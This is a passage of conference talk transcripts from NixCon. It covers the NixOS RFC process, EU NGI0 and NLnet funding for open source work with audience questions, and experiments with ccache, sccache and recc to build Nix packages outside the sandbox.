In March 2017, zimbatm, Tom Hunger and Moretea started the idea and established the first version of the process. We had a few really uncontroversial RFCs which were accepted, but otherwise, for everything which needed more discussion, we didn't really have any way of determining whether it was going to be accepted or not. So last year at NixCon, Graham, myself, flokli and a few others sat down and wrote up an RFC trying to improve the RFC process. That was accepted in January as RFC 36, and it created one team of five people who, for every RFC, select a team of people who are knowledgeable about that topic and who in the end decide. That first team of five is the RFC steering committee, whose rotation was defined in RFC 43, which was accepted in June. So we have these three teams, or two teams plus the leader of the second team. The RFC steering committee is Eelco, Domen, Shea, Mic92 and me; I think I didn't miss anyone. We meet once a week and go through all RFCs. When a new RFC is opened, there's a period where people can nominate the so-called shepherds, and the RFC steering committee then selects three or four shepherds. The shepherd team is responsible for trying to make sure that the conversation makes sense and actually focuses on the topic. The shepherd leader tries to facilitate meetings with the shepherds and the author so that they can discuss points that are controversial or need further explanation. We'd like to encourage the leaders to actually meet up with the other shepherds and the author more, because our experience is that the meetings bring the most benefit to the discussion and move RFCs along much faster than just commenting on them. The general process is: write a PR with an RFC; then there's the shepherd nomination period, with three to four people getting accepted as shepherds.
Then there's a discussion until it hopefully, at some point, reaches general acceptance, or everyone generally agrees that it probably isn't a good idea in the form presented in the RFC. Then the shepherds call the final comment period of 10 days, where they say: we all unanimously agree that we want to accept or close this RFC. During those 10 days people can bring up new points, in which case the discussion continues; otherwise, after the 10 days, the RFC is accepted or closed. And now I'm running out of time, so: there are a number of accepted RFCs and open RFCs, for example Flakes, and fpletz is going to open one on networking. The RFC steering committee is going to be rotated at the end of this year. We are looking for people who would like to be on it, and I'm going to open a thread on Discourse today. Please nominate yourself or other people, and at the end of the year the steering committee will decide on the next steering committee for next year. Thank you. I believe that was our final lightning talk, but I would like to quickly... just ask for the HDMI. Yeah, I would like to ask everyone, on behalf of the orga team, to have a look at the program and submit feedback on every talk that you have some feedback on. You just go to the schedule, click a talk on the schedule, and then there's a feedback button; just write your honest feedback so NixCon can be even more awesome next year. And yeah, I know you're all hungry, so we have an hour lunch break and we'll start again at one o'clock.
nix-cluster (xc) - Tomasz Cysz
What makes a formatter? - Lars Jellema
Nix GUI: Visualizing Nix store and scope - Eugen Shatsky
Configuration management with Morph - Marek Mahut
Nix-on-Droid: when the low-hanging fruit is also the ripest one - Alexander Sosedkin
Hercules CI - Domen Kozar et al.
10.5446/50685 (DOI)
about the EU Next Generation Internet initiative and the other ways to get your NixOS project funded, from Armijn. All right, thank you. So, can you hear me? All fine? Okay, good. So, my name is Armijn. As some of you might have noticed, I'm probably the only person here not using NixOS; it's actually Fedora. So you can boo me, you can throw things at me, but only chocolate, please. While we were driving to this conference, Rob just kept saying, you know, just give me your laptop, I will install NixOS right now. And I said, just keep your eyes on the road, okay? All right. So, let's talk about money, that mean, mean green, and how you can get paid for working on an open source project, including Nix and NixOS. Neil already talked a little bit about what he did, and I'm going to explain a little bit more about the specifics, together with Jos here from NLnet. This is an interactive talk, so feel free to ask questions. On the other hand, I've got quite a few slides, so you might want to save them for the end. So, a little bit of a poll: how many of you are currently getting paid to work on open source software? So there's one. And how many of you would like to get paid for it? So then this talk is mostly for you. So, Next Generation Internet. Basically, this is a program within Horizon 2020, a research program of the EU, and it is about making a more human internet. That's the blurb I got from their website, so I'm not going to read it, but basically you have to see it as reimagining and re-engineering the internet. Currently, the internet as we know it very much has a Silicon Valley imprint; a lot of its DNA just screams Silicon Valley. On the other hand, there is also a lot going on in other parts of the world to create their own internet. Think of what's happening in China, but also in India.
If you're following a little bit of what's happening with the internet in India, what their government is trying to do, it can get quite scary. So the EU, even though it can be considered kind of big and a moloch at times, wants to re-engineer the internet, make it more humane, and get core values like democracy, diversity and so on ingrained into the internet, to actually make it a better internet. I think we can all agree on that. One sub-project of that is NGI0, which I will be talking about today. NGI0, first of all, is a consortium with quite a few organizations involved. I'm not going to run through all of them, but the most important ones you see there: the NixOS Foundation, that's us, yay, and the NLnet Foundation, and a whole bunch of others. Actually, I should have had that picture up. So there are quite a few organizations involved, covering things like translations, secure software, packaging, accessibility, you name it. A whole bunch of organizations are involved in the NGI0 project. But before I can explain what we actually do, I need to tell you a little bit about what a normal grant procedure in the EU looks like. The normal process to get funds in the Horizon 2020 program, or any EU program for that matter, is basically like this: you form a consortium of at least three organizations from various countries, partners from the right parts of Europe. So you get one from northern Europe, one from the garlic countries and one from the cabbage countries, and then you're usually fine, geographically. You send in a proposal, then you do stuff for a few years, and then you basically throw something over the wall and you get paid. Sometimes it doesn't even compile, or work, or do what it was supposed to do. So this is a very process-heavy thing.
It's not very suitable for open source, because most of us like to work in a much more agile way: small projects, fast releases, work on tiny things, and then just move on to the next interesting thing, because that's how we work. This process is not for us. It's for the big corporations: the big telcos, the big industrial conglomerates, who actually have whole departments just writing proposals to get money out of the EU. And if you've ever looked at writing one of those proposals, I have, it's horrible. It doesn't work for us. I would need to hire something like two or three people just to do that paperwork, and have them on payroll. Of course I would get it reimbursed, but it's a lot of overhead. This is totally unsuited to SMEs or open source developers. And it's also not helping the public, because you get something that might not even work. But you know, it fits the proposal, they got money for it, so it should be good, right? So basically a lot of this money is not working for us, and that is something that should change. So the NLnet Foundation organized a consortium and tried to see: okay, maybe we can do something here that we've already been doing for the last 20 years. The NLnet Foundation is a Dutch non-profit. They trace their history back to the very first internet provider in the Netherlands, in 1982; that's before most of you were born. They sold their provider off to UUNET, later Verizon, got a bunch of money, formed a non-profit, and since 1997, so before some of you were born, they've been handing out grants for open source development. What they are doing is a very lightweight approach: a developer says, I've got this great idea, sends in a proposal, and NLnet looks at it and thinks: you know, if you can do this, then we are willing to make a donation to you. And it's super lightweight.
The developer starts working, delivers, and then there is a payout after completion of the milestones. That's the complete opposite of how the normal EU grants work. And this has been working for a very long time, more than 20 years. They've sponsored things like DNSSEC and many other things that I don't even remember; there's a whole list on the website. So in the background, they've been doing a lot of very good work. Also important: they're a registered charity in the Netherlands, and at least in the Netherlands, and also in some other countries, because it's a donation from a charity, you don't pay taxes on it, which can be nice. So, NLnet wanted to bring this lightweight process to the Horizon 2020 program. They formed the NGI0 consortium, sent in proposals to the EU, and were awarded 11.2 million euro to spend on open source development, which is pretty cool. And that's for two themes. One of them is search and discovery, which is basically about unlocking all kinds of data and making sure that people can discover data in some way. Think search engines, IoT search, whatever; anything search and discovery related. The other is privacy enhancing technologies, so think security. And the EU is paying careful attention to see how this will work, because I think they secretly know that their normal grant process doesn't really work. Okay, the grant program works for some people in the EU, but not the vast majority. So they're thinking: how can we make it work for everyone? They're watching how things work out, and then maybe, if it's successful, they might expand this. And that would be good for all of us.
Jos just told me that, as of today, we've been running this for, what, 10 months? A bit less than one year. And so far, 4 million euro has been allocated for development in these two domains, for about 120 projects. What is interesting is that 95% of the grant seekers have never participated in any of the EU's grant programs before, at least not in Horizon 2020. So this is reaching a completely new group of people who needed a grant but couldn't get one, or didn't know how to, or thought it was way too much overhead. That's a very good thing. So, I already showed that one. And then of course, the role of NixOS in this consortium. The NLnet Foundation are big fans of NixOS. We have a history going back a long time, even before NixOS started, because the current director of technology of the NLnet Foundation was working for the Dutch Academy of Sciences at the time, and he was the person who read Eelco's original proposal and signed off on it. So it goes back to way before there was NixOS, and way before he was working for NLnet. There's a very long history, which is cool. And they really like NixOS; they think it's fantastic, and of course it is. They are convinced that making deployment of software easy will be essential to making this project work. Because normally they would get something like: yeah, to run this software you need this specific version of Ubuntu with these packages and maybe that patch. Or for another component, you need SUSE with these packages installed and that out-of-tree stuff. And they thought: that's just too cumbersome. That will never, ever work if you want an agile, smooth process. So the ideal is that when a project comes in, we help them with things like packaging the software, so that the software can be demoed just like that.
Just run nix-shell or nix-build, then run the result, and it works. That's the ideal, and that's why we are involved. We've been given funds to help with things like packaging the software of the projects coming in through NGI0, and also to improve the Nix infrastructure itself to help with that packaging. We can choose to spend those funds as we like, as long as it fits within these two categories. So then, of course, the question is: what can you do? One option is to send in a project, and please remember that it doesn't have to be about Nix or NixOS itself. It has to be about search and discovery or about privacy enhancing technologies; anything goes. So if you have a cool idea, even if it's outside of NixOS, and you think, okay, this would benefit the world and it's about search and discovery or privacy enhancing technology, send in a proposal. Please. I think the next deadline is December 1st, so you still have about one and a half months. Packaging software is also something you could do, and there might be a few opportunities for this in the near future; we're still looking into it. Or you could help improve infrastructure; there might be a few opportunities there as well. Just come talk to us if you're interested. And then, how to send in a proposal. First of all, keep it concise. You don't need to send in a PhD thesis. A few pages, clear deadlines, clear milestones, and how much per milestone: that is basically what is needed. And be realistic. Don't ask for the moon; 11.2 million euro is a lot of money, but it has to be spread across many projects. Split big projects into several smaller parts if you want to. And be patient: the proposals are first reviewed by an independent committee.
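The "just run nix-build and it works" ideal can be made concrete with a tiny example; the project and script names here are made up for illustration:

```nix
# Hypothetical default.nix for a grant project, so a reviewer can demo
# it with plain `nix-build` (or hack on it in `nix-shell`) instead of
# following distro-specific install instructions.
{ pkgs ? import <nixpkgs> {} }:

pkgs.writeShellScriptBin "ngi-demo" ''
  echo "hello from a reproducibly packaged NGI0 project"
''
```

A reviewer would then run `nix-build` in the project directory and execute `./result/bin/ngi-demo`, with no Ubuntu-version or out-of-tree-patch caveats attached.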
And then they're sent off to the EU for additional review. One of the checks the EU will do is whether you're on a blacklist, because they actually have a blacklist: people who applied for grants but were convicted of fraud or similar simply cannot participate. So this process takes some time; it can take some months before you get the go-ahead. So if you're thinking, okay, I need to start on December 2nd, then, well, no. You have to factor in a few months of delay. It's just how it works. Also, get inspiration from existing projects. All of the projects that NLnet has funded are on their website. And another thing that is very important: even if you're not in the EU, you can still send in a proposal. What matters is that it benefits internet users in the EU; it has to be for a better European internet. But something that's good for the world is probably also good for Europe. So even if you're outside of Europe, you can still send something in. I could make an obligatory Brexit joke here; I will not. But even if you're in the UK, you can still send it in. So, some of the approved projects right now. The Nixpkgs update work from Ryan, that is one that was approved. He will be working on things like automatically checking CVEs to see if there are updates to packages, and then automatically trying to integrate them. Spectrum from Alyssa, she's working on that as well, so that also got some funding. And of course, you just saw Samuel's talk about mobile NixOS. But that's not the only stuff. Some examples of other projects: one that I am personally very excited about is Betrusted from Andrew Huang, whom some of you might know as bunnie. He's making a protected hardware device for private matters.
Something like a sleeve for your mobile phone where you can store passwords, and then your phone has to go through that device to get access to private things, so all those evil apps cannot get at your private data. That's something that I personally think is super, super cool. Another one, which I have not looked at but which Jos says is super cool, is Verifpal, which is about verifying the security of cryptographic protocols. Maybe you want to talk about that for a few seconds? Hello. So my name is Jos van Noeve. I actually work for NLnet, so if you have any questions afterwards about this process, just come to me. I'm here until Sunday, happy to talk about anything. But this Verifpal project, yeah. Cryptographic protocols are of course very important. We are financing this project under the privacy theme, because if something is not safe, you cannot protect your privacy. And what Verifpal is, is a simpler way of verifying protocols than what academics are using right now. It's very hard to prove that a protocol is secure, and what the author of Verifpal has done is create an infrastructure project that makes it much easier to verify this. On top of that, he even used our financing to hire a manga company to write a manual which is completely in manga style. So if you look up the Verifpal project, you can have some nice manga reading and learn something about security. So I'm not sure what kind of comic book style we should use for NixOS. And then there's another project, Discourse ActivityPub, so you can have a distributed, federated thing with likes and replies. But that's of course not the only way you can get funding. There are many, many other opportunities to get open source development funded, including things like tax cuts and grants. And a lot of people I talk to don't know that these opportunities exist, so I just want to highlight a few of them.
In the Netherlands, companies can actually get an income tax cut for innovative work. It's called WBSO; I will not spell out the Dutch name, because most of you would not understand it. Basically, if you're a freelancer, a sole trader, a one-person company, whatever you want to call it, or a limited company, you can apply for this and get an offset on your income tax, which is very, very useful. I actually use it for my own company: I spend a minimum of 500 hours a year on research and development, and then I get a tax reduction. My taxable income is lowered by the subsidy, and over that part I basically pay no income tax, which easily saves me a few thousand euro per year, which is nice. This is actually quite common for companies to do in the Netherlands; there's a whole industry built around these subsidies. It might sometimes feel unethical, but I just think of it as taking my tax money back to do good things with it, instead of letting it go to some company that was built around harvesting subsidies and lining their own pockets, which is very often what happens. This is a good thing. Starting companies can get an even higher tax cut. So if you're thinking, okay, I have a Dutch company, I want to free up some of my personnel's time to work on open source software: you write a research proposal, you send it in, you get a tax cut, and you can deliver something to the world that benefits a lot of people, which is nice. Of course, if you're kind of evil and doing things like patents or selling licenses to IP, then, also in the Netherlands, you can get a very big cut on some taxes: instead of 25%, you only pay 7%. That's what the big companies are using, by selling their IP.
Of course, I'm hoping that none of you are actually thinking about applying for patents and then licensing them to other people, but that's another discussion we can have. I'm using this to illustrate that there is a lot of stuff out there that can be used by companies, and that actually is being used by companies, while most open source people don't know anything about it, and that's a wasted opportunity. In Sweden, there is an innovation agency called Vinnova that you can also talk to about research grants. I know a few people who've done that successfully, and they're using it to do open source work; it's very useful. In the Netherlands, there's the SIDN Fund. SIDN is the .nl domain registry, and they have their own fund for programs that improve the internet. You can apply there for a grant of between 10,000 and 75,000 euro if you're doing something good for the internet. In Germany, you can go to KMU-innovativ, a research and development program from one of the federal ministries, and there are things like the Prototype Fund. These are all open to research and development or open innovation. So in your country, there are most likely opportunities as well. I haven't even looked at Spain, but I'm pretty sure there's something like that there, and in Italy, and in France as well. It really pays off to do some research into this if you want someone to pay you for open source software development or open source research. So if you're in that situation, thinking, okay, I really want to work on open source stuff, but I don't know where to get the money from: just look into this. It can really pay off. And then, basically, Q&A. Anyone? So I work at Mayflower, a medium-sized company, and I'm wondering, if I have a project where I want to improve Nix...
Would it make more sense to try to do that through the company or independently? I would say that depends on your contract with your company. I would first talk to your boss about it, because it might be that your contract says that everything you do, even in your spare time, belongs to the company. If that's not the case, it depends on whether or not you would be competing with your company. So what I would do is first talk to your company, talk to your boss, work something out. And even then, it might be better if the company applies for the funding. Yeah, but is there anything on NLnet's side that would speak for one or the other? From the side of NLnet, we accommodate both. If you want to apply as an individual, that's fine. In some countries it's easier to get the tax advantage, because, as was said, if you get a grant from us, basically what happens is: you send in a plan, you fulfill what's in the plan, and then we give you a donation. That's not taxable income, so that's an advantage to you. If, however, you do it through a company, then the company will have to pay taxes on your salary. Depending on that, you can evaluate what would be more beneficial. Obviously you can do it via the company if that's what they prefer. But you can apply as an individual, as a company, as a combination of a company and an individual, or as a non-profit. From our side, anything goes. When you put in a proposal and we accept it, we write a small memorandum of understanding in which we say: when you do this, we give you a donation. And who is party to this MoU doesn't really matter to us. In this case, there has to be a link to the EU, but that's it. Other questions? Yes. Can you say anything about, like, who reads these? How technical can you get in a proposal? Do you need to dress up certain things? Well, Jos is actually reading those proposals.
So I'm just going to give the microphone back to him again. Okay. Well, it can be fairly technical. I mean, I'm a NixOS user; more than half of our people are using NixOS, and of those, more than half would be able to write a Nix expression themselves. So fairly good. That doesn't mean we know everything about all the cryptography layers, but we do have a long history of subsidizing projects, so we know not just the technical stuff, but also who the long-time players already are. And we know how to look at, for example, commit histories in projects, if that's something you want to reference. That's something we can easily understand, even if we don't know the particular library you're talking about. We can very easily look at your commit history somewhere and see: look, this person wants a grant for this project, and he helped start it, or he's been the maintainer for half a year, or he's written this cool feature for it. That's something we look at heavily. I don't have so much a question as an addition to that: I applied with Lizard, a project to do open communication stuff. The proposals you get to send in are fairly limited in terms of words, so the amount of technical detail you can actually squeeze in is fairly limited. If you want to go into details, you straight up don't have the space for that. So that makes things a bit easier. Hi. Thanks for a great talk. I'm curious about your view on collaborations. Say two individuals or two companies would like to make a proposal together: is that something you've done before, or how does the process around that work? We do that all the time.
But what we do often prefer: a collaboration is fine if you can split it up into independent projects with independent deliverables. We always prefer that, because if one part of the collaboration finishes early, we can already wrap that part up administratively, whereas in one big collaboration, wrapping up the project depends on everybody finishing. But yeah, of course, we very much encourage collaborations, and we also encourage that when you apply, you look at the proposals we funded in the past, because then you get an idea of the type of projects that we do. It actually ranges from very low in the stack to very high; that's something that hasn't been emphasized much yet. We have supported hardware, actual routing hardware, but we also support end-user applications. So it can be very wide. Thank you. I have a question. This hasn't been addressed, so I'm curious: with regard to the funding itself, okay, you can get tax cuts, that's great, but what's a reasonable expectation for the funds? Can you get industry-standard rates, or how is that evaluated in the proposal? So, how do you explain the... So of course, if you're a highly paid consultant asking something like 200 euro per hour: forget it. I don't think the EU will say that's okay. So no, industry-standard consulting rates are not going to fly. But what would be a reasonable ballpark figure? As you saw in the presentation, currently we have allocated 4 million for about 120 projects. Yeah, I mean, okay, that still depends on how many people and for how long. Most of the projects are single individuals. But if you would like to go with an hourly rate, then the hourly rate is not consultant level. It also depends on where you're living. Basically, in your proposal you determine what your hourly rate will be, and we just give a donation if we think it's worthwhile.
So make an educated guess. Thanks. But I can give you a few hints after this talk. Sorry, just wanted to hook into the same thing, maybe to simplify the question a little bit. The main question is: is it something where you can say, I want to have a project on which I want to work full time for a year, for example, of which you can pay living costs? Is that the kind of target? Or would it be something where you say, not usually — when people want to do a long-term project like a year, it would have to be a side project next to your normal work, for example? I think that is the most interesting thing about that. I think there's actually both. Some people are doing it as a side project for just a few thousand. Some people are asking for a bigger grant. So I think that the maximum you can ask is... For a really good first-time proposal, we have given out like 50,000. So that should cover your expenses for a long time. But we've also... There was one proposal, for example. It was a really great project to extend an existing project with ActivityPub support. ActivityPub is a standard to sort of build a decentralized social network where everybody just talks to each other via messages on their own website. And I'm not sure if it was the one that was extending Discourse, but it was a great project which we liked. So we wanted to fund it. And at that point, the guy who was going to do it got accepted into the Solid team of Tim Berners-Lee. And obviously he went for that, but he said, I still want to do this. Can I do it in the weekends and then ask for... well, much less, obviously. And we were so happy that he was still committed to doing the stuff that he wanted to do before, that we accepted it. So you can do it both ways. You can combine something which you want to do in your spare time, or maybe reduce your number of hours a week a bit and in that time work on an NLnet project, or try to do it full time.
So I think there are no more questions, because the microphone has been taken away. If there are any other questions that you just want to ask us, both you and I will be here for at least today and tomorrow. And you will also be here on Sunday; I will not be. So just come up to us, ask questions, we would be more than happy to answer them. All right. Thank you.
Since late 2018 the NixOS Foundation is participating in the EU's Next Generation Internet initiative, which will grant a total of 11.2 million Euro to independent researchers and open source developers. This talk will dive into the why and how of the program, how it will benefit NixOS, how you can help us out and also highlight other ways to get your NixOS project funded.
10.5446/50686 (DOI)
So, the last talk of this year's NixCon is going to be about building outside of the sandbox, by Layus. Like, this one is working? Perfect. Okay, so hello everyone. I have this strange pleasure to be the last one to talk at this conference, but this slot is precisely made for you to think a bit. I have no real message for you, or rather I would love to challenge you and make you think about what we do a bit differently. So I am known as Layus. I am currently doing a PhD on build systems; we can have a chat about that later on. And this is an experiment that comes from a presentation that I made two years ago. So it will go very simply with three different examples. I want to build outside of the Nix sandbox, and I will use different tools to do that, like ccache, sccache and recc. You will get explanations of those. And then we have a small discussion about what it means, where do we go, and a final conclusion. So two years ago I was here, precisely in front of you, and I had this video. It didn't work at the time, but I think it's fixed now. So this video basically shows what happens when you are trying to build a long package like Firefox. For me it's often Firefox, but possibly you are building GTK or anything like that. And then you reach the top, nearly all of the compilation is done, and then for some reason at some point, well, there is a fixup thing that doesn't work and bam, you are done. You are just back at the start. And if you want to fix the issue, then you have to pay all of the compilation of the full package again. So what's the situation now, two years after that? Well, we cannot build a Nix package incrementally, of course, and that's because of the sandbox. It means that for Firefox, GTK, LibreOffice, Qt, GCC — well, GCC is specific — all of these things you have to build from scratch every time you make a change to the derivation.
Possibly that's not something that happens often for you, but if you try to hack on nixpkgs, especially if you want to refactor the standard environment — something that you should never do, but if you work on that — then you will pay for having to build everything. So my first attempt to escape this sandbox is ccache. ccache, I guess everyone knows it, no need to explain. It's quite an old tool, but it's still heavily used in some places. And the basic idea with all of these caches is that, well, you already asked me to compile this file with these options and with these headers, so I already know the answer. I can just fetch it from the cache. A small picture, right? So you just query the cache, and the cache says, well, no, it's not there yet. Okay, so you compile locally and then you upload it to the cache for the next iteration, and then you get your result. Which means that the next time, when there is a cache hit, you can just recover the result from the cache and that's it. It should be quite fast. Okay. The funny thing is that I said, well, I want to try that, and then I discovered that it already exists. It's already feasible in nixpkgs. There is a ccacheStdenv. That's a modified standard environment that allows you to use ccache. There is a lot of wrapping going on there — we can have a small chat about what that means — but basically if you replace the standard environment with that one, you get ccache working. Well, you get ccache working, but you still have the sandbox, right? So we'll see how to get out of that. But on NixOS, that's also already provided, and it comes with all the defaults that you need to change in Nix, meaning that you need to build while allowing an extra folder, the cache, to be mounted inside the sandbox. On NixOS, we do that for you. If you are just using Nix, then you have to use options to do that.
I should check exactly how they did it, but they made it in a very smart way, in the sense that you can specify a list of packages that will have ccache enabled, so that you're not breaking the sandbox for everything, but only for these very heavy packages that you will compile often. So if in your company you have one big package like that, you can add it to the list. Okay, let's try the demo then. So the demo will work. I've taken i3 just because it's an average-size C++ project. And we will build that normally, and then with ccache, to see what it gives. Okay, let's go. Yeah. Okay, so if I want to build i3 normally, I just need to build this i3 attribute, and we will try to filter the output. So it's been modified a bit. Just checking the derivation. So it's been modified a bit because I've added some kind of debugging to it, so you can just see the time that each phase takes. So we get this unpack phase, well, that's way below a second, the patch phase way below a second too. I expect something about 10 seconds to build. So you have 8 seconds to configure and 10 seconds to build i3. That's with the sandbox, everything's normal except this extra logging added. Now, if we start with the other tool, we can nix-build an i3-ccache. If I do it like that, then the sandbox is still active, so it won't change anything, right? So you need to add an option: that's extra-sandbox-paths. With that, I can mount the ccache directory inside the sandbox. Well, I don't want to do that at the moment, because this cache — we will try to clean it before, just to be sure that there is nothing in there on the first try. We can start compiling it. And of course I'm still missing that. I'm not sure if you have an idea of what's to be expected, but in this case there is nothing in the cache. So we need to compile everything, so it will take about the same time.
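As a rough sketch of the NixOS integration described above (the option names are NixOS's ccache module, but treat the package list and cache path as illustrative — check the current NixOS options for details):

```nix
# Hypothetical NixOS configuration sketch: enable ccache and opt in
# specific heavy packages. packageNames rewrites those packages to use
# ccacheStdenv, and NixOS takes care of allowing the cache directory
# inside the build sandbox.
{
  programs.ccache.enable = true;
  programs.ccache.packageNames = [ "i3" ];  # example package

  # Plain-Nix equivalent of what NixOS configures for you, in nix.conf
  # (the path may differ on your system):
  #   extra-sandbox-paths = /var/cache/ccache
}
```

With plain Nix, the same hole can be punched per invocation with `--option extra-sandbox-paths`, which is what the demo below does.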
And also we have to pay an extra overhead for serializing and inserting everything into the folder. So this should be a bit slower, actually. So now it's 10 seconds and 15, so it matches what we had before. We went from 8 to 10 and from 10 to 15, just because we paid the overhead of initializing everything. Now we need to compile it again. So I made a special trick for you: you can just say "again" to the package — well, I can't explain you how it works, but it's nothing very magic. The nice part is that it starts the exact same compilation with some random stuff added to the derivation, so that Nix thinks it needs to be done again. And this time it's supposed to be faster. Modulo demo effects. Well, okay, that's not exactly what I used to have, but it makes some sense. So we have all of these. If you don't mind, I will take the old results that I had. They are basically the same, 7 and 6, right? That's what we had, 7 and 6. So the rounded numbers are the same. Well, nothing unexpected here, except that you see there is this 6 seconds that's below the previous build times, and in a sense i3 is not a tool that uses heavy GCC compilations. There is a lot of man page generation, documentation generation, a lot of random stuff that is not cached by ccache. So of course, on a bigger project that uses more C compilation you would have a better speedup here, but possibly you would also have a higher penalty the first time that you use it. Makes sense. Well, is this a good thing? The problem is that when you start to make holes in the sandbox like that, well, you know, you don't have any guarantee of what's happening, right? A small hole in the sandbox and that's over. But at the same time — and we'll have a discussion at the end — I think it can be a good thing, at least in some well-defined situations. Anyway, let's go to the second attempt.
So, ccache is good, but people do better things than that. What if I want to use the same cache as my colleague or someone else? We should put that on the network, and that's basically the idea of sccache, the shared compilation cache developed by Mozilla. So it's Mozilla: they made it for C and C++, and then they also added Rust, because, well, it's Mozilla. And if you look at the diagram, it doesn't change much. Basically it's exactly the same; the only change is the nature of the cache. It's not a folder, now it's a network machine. Which means that you are not mounting a folder inside the sandbox. You are making a completely different type of hole in there: you need network access. Well, is that possible? No. No, it's not possible, it's not supported. You cannot make a small hole and say, okay, I want this machine, I want this port and that server — it doesn't work. So at the moment, and for the experiments, what I do is just disable the sandbox. So we are entering strange territory, but technically it should be feasible to have a restricted network access in the sandbox, if you want to keep some of the properties but not all of them. Yeah, I also discovered that disabling the sandbox is not possible when you are building in a different store than your main store. So all of these demos are just changing my main store — possibly it breaks things, but we'll see. Yeah, okay, disclosure here. I won't do it, because we don't have much time, and also because it's not that different: just disable the sandbox, configure the remote, and that's it. So I will go directly to the third attempt, which is recc. And with recc we keep the same idea, except that we have remote execution.
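To make the "disable the sandbox, configure the remote" step above concrete, here is a sketch of what such a setup could look like. The cache backend and its address are made up; the environment variable is one of sccache's documented backends, but double-check against sccache's README before relying on it:

```shell
# nix.conf: give builds network access by turning the sandbox off
#   sandbox = false
# or, per invocation:
#   nix-build --option sandbox false ...

# Point sccache at a shared backend, e.g. a Redis instance
# (hypothetical host; sccache also supports S3, memcached, and others)
export SCCACHE_REDIS="redis://cache.example.internal:6379"

# The build then wraps each compiler call, e.g.:
#   sccache gcc -c foo.c -o foo.o
```

This is a command sketch, not a working recipe; the interesting part is that the only Nix-side change versus the ccache setup is trading the bind-mounted folder for full network access.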
That's a tool that has been developed at Bloomberg, and they do it mainly because, well, they love Bazel, they would like to have all this remote execution stuff, but they can't move at the moment — migrating all of your builds to Bazel, that's a huge investment, so they don't want to do that — and they developed this very small replacement where, instead of changing all of the build system, you just wrap each GCC invocation with it, and at that moment everything is sent to the server. Well, you get the better explanation with the diagram, but what we do in this case is that we remove the local compilation and everything is remote. The main advantage is that you can parallelize a lot more. If you have like 100 workers and a huge workload, then you can spread the workload over 100 workers. That's the main advantage of not executing the compilation locally, of course. So this is the example that may not work perfectly. I discovered that you need, of course, a server that allows this remote execution. So in this case it's BuildGrid. I could have used another one, but I discovered different issues. Not sure if it's Nix-related or my-VM-related or something, but I cannot work in parallel, so I can only compile one thing at a time, because the server won't take many items at the same time, which is a bit stupid. It's not a limitation of the tool. It's used perfectly well in a lot of companies, so it's most probably an issue with my setup, but anyway. So it's single-threaded, and the worker is quite slow. So if I had to do the demo for you, well, that's the time it takes. It takes about three to four minutes to compile now. Well, there are definitely some issues. Nevertheless, I think this is mostly bad configuration on my part, but I really want to show you what kind of strange things you can discover when you do that. So let's start again. So if we... This is completely stupid: it's a BuildGrid server, but it's called buildfarm. Well, we have to live with that.
Now, on this server everything is already compiled, so we will remove what's in there. I removed the content that I stored on the server, I removed the database, so there is basically just a clean server. And I start the server. I also need to start a worker, of course. Yeah, that's initialization. And then, because I'm lazy, I did not specify any kind of Docker worker, any environment — I just use whatever is on this machine. Well, that's it. And now, can we make this smaller? Okay, right. So what we want to do now is build exactly the same thing as we did before. Yes. So it's nix-build. Okay, we want this i3-recc. I will take the recc-small, whatever. This one should be built already. Let's try. Option sandbox false — this is what allows you to access the network. Yeah, it's already built. That's good. And the next one is already built, I guess. Yep. I need to do it over and over again. Yeah, okay, that's working. Very useful when you have to build other things like that. And well, no, I won't show you. Let's see what we get. It fails. It fails, and that's normal. That's what you get on the first attempt. There is nothing on this remote host; you need all of the build inputs. All of the dependencies of your derivation need to be there in a way. And this is of course not automated. It doesn't work at the moment, but I think there is some potential to make an integration, to make Nix catch the network access and wrap it in some way — we should be able to find a way to make this work. At the moment, what we have to do is upload the inputs. So, oh crap. So I just try to collect all of the build inputs of my derivation and then I send that to the server. This is a trick. There is always a trick. The network is not that good that I can upload everything, but I just removed one of the missing files, and this is the one that has just been uploaded. So if we start again and build this again-again-again thing, what do we expect? Does it work now? Well, it doesn't work.
The tool is still missing. How is that possible? We just added the tool that was missing. And in this case it's one of the most frustrating parts of this: the failure is already in the cache. So we are just fetching that. It says: the previous time it failed, so I can fail again. If you want to work around that, then you need to kill everything. In this case I have no idea how to remove one entry, so let's just be efficient. Okay, everything restarted clean from scratch, so now I can build it. And well, of course it takes like three minutes, so we won't wait for the end of that. But this time it should work. Let's wait. By the way, this recc-small is configured in a way that recc is not used in the configure phase, because the configure phase just drops a lot of the outputs, and so you don't see the error that we had before. That's the reason for the -small. So it's working. It's compiling one thing at a time. Well, it will compile for three minutes. I don't really need it, because I have everything in there, so let's drop that. Okay. It makes sense. So as you've discovered, we need to have all the inputs on the server. That automation does not exist at the moment, but the fact that it failed is also a good thing. It shows that if you are missing the exact compiler that's required by that derivation on the worker, it will say: I don't have it. It's not trying to use another thing. It's not trying to use the GCC that's installed on that machine. So Nix, by design, with all of these strange paths and hashes, makes it so that you do not pick up random stuff. We've also discovered that these impure errors are cached. The fact that there was something missing in the state of the worker — this is in there forever. That's really annoying. So, well, that's something to care about. But I think we could really automate that.
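To give an idea of what the recc side of this looks like (the server address and file names are made up; recc is configured through environment variables, but check its README for the exact names):

```shell
# Hypothetical remote-execution setup for recc (Bloomberg's tool).
# The BuildGrid endpoint below is an example address.
export RECC_SERVER=buildgrid.example.internal:50051

# Instead of invoking the compiler directly, prefix it with recc.
# recc turns the compile into a Remote Execution API action, sends it
# to the server, and fetches the cached result if one already exists.
recc gcc -c hello.c -o hello.o
```

This is only a sketch; as the demo shows, the worker must already have the exact compiler store path available, which is the part that is not automated yet.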
And well, the gain is potentially really huge, because in Nix, if we can have the real exact set of inputs, we could share this information with everyone; that would be like a binary cache for very small C-file builds. Well, now there is a question: this is not pure, right? We've broken everything. The balloon has exploded. The sandbox is no more. What remains of all the good properties that we had with that sandbox? So, is it still reproducible? Is it still pure? Is it still hermetic? And all of these nice words that we are used to and that we absolutely want in our builds. And for that, I have a small answer that's based on Nix experimental. What I call Nix experimental is an experimental branch from Eelco where you can transform a derivation into — that's difficult to say. Well, the problem with most of our derivations is that we have plenty of them that look the same, they have the same content, but because they come from a different .drv they are stored in a different store path, and then that store path is inside the binaries, it's inside a lot of places, and if you compare, the bits are different. But we can do something that's funny. So let's find the i3. So this is the one that we built before, so it's there. If we go to Nix — of course it's a local checkout of Nix, and another one, because I had to build a different branch. Okay, let's hope that it works correctly. Yeah, you have a lot of output in this case. See, if I reduce the size, is that still readable for everyone? Well, in this case you have a lot of random stuff, let's just cheat a bit. There is a mismatch between the daemon and the Nix that's running, and they don't agree on what we are trying to do, but you see here that this 